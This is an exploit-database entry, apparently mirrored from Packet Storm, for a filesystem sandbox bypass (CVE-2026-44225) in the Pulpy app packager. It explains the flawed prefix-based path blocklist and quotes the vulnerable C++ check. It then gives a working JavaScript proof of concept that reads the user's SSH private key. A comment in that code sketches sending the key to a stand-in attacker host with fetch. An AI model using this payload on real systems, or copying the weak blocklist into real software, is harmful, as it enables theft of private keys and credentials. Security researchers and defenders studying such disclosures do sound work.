Share
## https://sploitus.com/exploit?id=PACKETSTORM:225275
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
    # Google Dork: N/A
    # Date: 2026-06-19
    # Exploit Author: Onur BILICI @basekill
    # Vendor Homepage: https://github.com/enesgkky/pulpy
    # Software Link: https://github.com/enesgkky/pulpy
    # Version: <= 0.1.1-Beta
    # Tested on: macOS, Linux
    # CVE: CVE-2026-44225
    
    Description:
      Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application, 
      granting it access to the host filesystem. A 'validateFsPath()' function is 
      implemented to sandbox this access using a blocklist. However, this blocklist 
      is incomplete. 
      
      The implementation only catches root-level paths (e.g., matching "/Library/" 
      at index 0), meaning it completely misses user-specific paths such as 
      "/Users/<username>/Library/" or critical configuration directories like 
      "~/.ssh/", "~/.aws/", and "~/Documents/". 
      
      As a result, any malicious web application packaged with Pulpy can bypass the 
      sandbox to read and write arbitrary sensitive files in the user's home directory.
    
    Root Cause Analysis:
      In 'src/bridge/native_modules.mm', the path validation logic relies on a weak 
      prefix check:
      
      std::string normalized = fs::weakly_canonical(p).string();
      if (normalized.find("/etc/") == 0 ||
          normalized.find("/var/") == 0 ||
          normalized.find("/usr/") == 0 ||
          normalized.find("/System/") == 0 ||
          normalized.find("/Library/") == 0) {
          return "";
      }
      return normalized;
    
    Proof of Concept (PoC):
      An attacker can execute the following JavaScript code within a Pulpy-packaged 
      application to exfiltrate sensitive user data:
    
      ```javascript
      // Bypassing the sandbox to read sensitive files from the user's home directory
      try {
          // Example target: SSH private key
          // Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
          const sshKeyPath = "/Users/<username>/.ssh/id_rsa"; 
          
          pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
              if (err) {
                  console.error("Failed to read file:", err);
                  return;
              }
              console.log("Successfully bypassed sandbox! Content:\n", data);
              
              // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
          });
      } catch (e) {
          console.error("Exploit failed:", e);
      }